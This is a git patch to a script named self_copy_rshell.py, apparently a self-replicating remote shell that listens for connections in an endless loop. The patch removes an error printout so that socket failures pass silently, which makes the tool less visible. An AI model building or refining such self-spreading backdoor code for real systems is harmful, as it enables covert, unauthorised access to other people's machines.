From 67fc344680e714b01b32cd9ed67f02141e2ae050 Mon Sep 17 00:00:00 2001 From: id101010 Date: Fri, 11 Oct 2019 14:21:40 +0200 Subject: [PATCH] Do not print errors --- self_copy_rshell.py | 1 - 1 file changed, 1 deletion(-) diff --git a/self_copy_rshell.py b/self_copy_rshell.py index 7efa3d2..ea27c04 100644 --- a/self_copy_rshell.py +++ b/self_copy_rshell.py @@ -51,7 +51,6 @@ try: #!x s.listen(1) #!x # poor mans socket error handling except socket.error as e: #!x - print(e) #!x sys.exit(0) #!x # forever try to accept new connections while 1: #!x